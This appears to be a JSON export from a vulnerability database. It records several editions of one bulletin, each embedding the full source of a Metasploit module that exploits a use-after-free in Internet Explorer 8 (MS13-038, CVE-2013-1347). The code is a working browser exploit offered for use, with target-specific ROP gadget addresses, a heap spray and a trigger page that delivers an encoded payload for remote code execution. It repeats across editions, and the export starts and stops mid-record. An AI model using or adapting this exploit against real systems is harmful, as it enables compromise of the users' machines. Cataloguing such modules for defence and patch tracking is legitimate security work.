"THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-03-24T09:32:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2019-03-24T09:32:03", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "7a6925df4b88b12f210040351a198e68", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-03-24T11:30:11", "history": [], "viewCount": 116, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-58238", "SMNTC-59162", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:3EF0C66878E70BB3C355385365B1DFBF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-03-24T11:30:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2019-03-24T11:30:11", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "5a02fbacefcf00cdcbb628b7ccd1e3ef", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-05-28T20:29:44", "history": [], "viewCount": 116, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-38195", "SMNTC-50218", "SMNTC-59162", "SMNTC-58238"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "saint", "idList": ["SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-05-28T20:29:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:29:44", "differentElements": ["cvss"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-05-29T14:30:49", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-38195", "SMNTC-50218", "SMNTC-59162", "SMNTC-58238"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "saint", "idList": ["SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-05-28T20:29:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 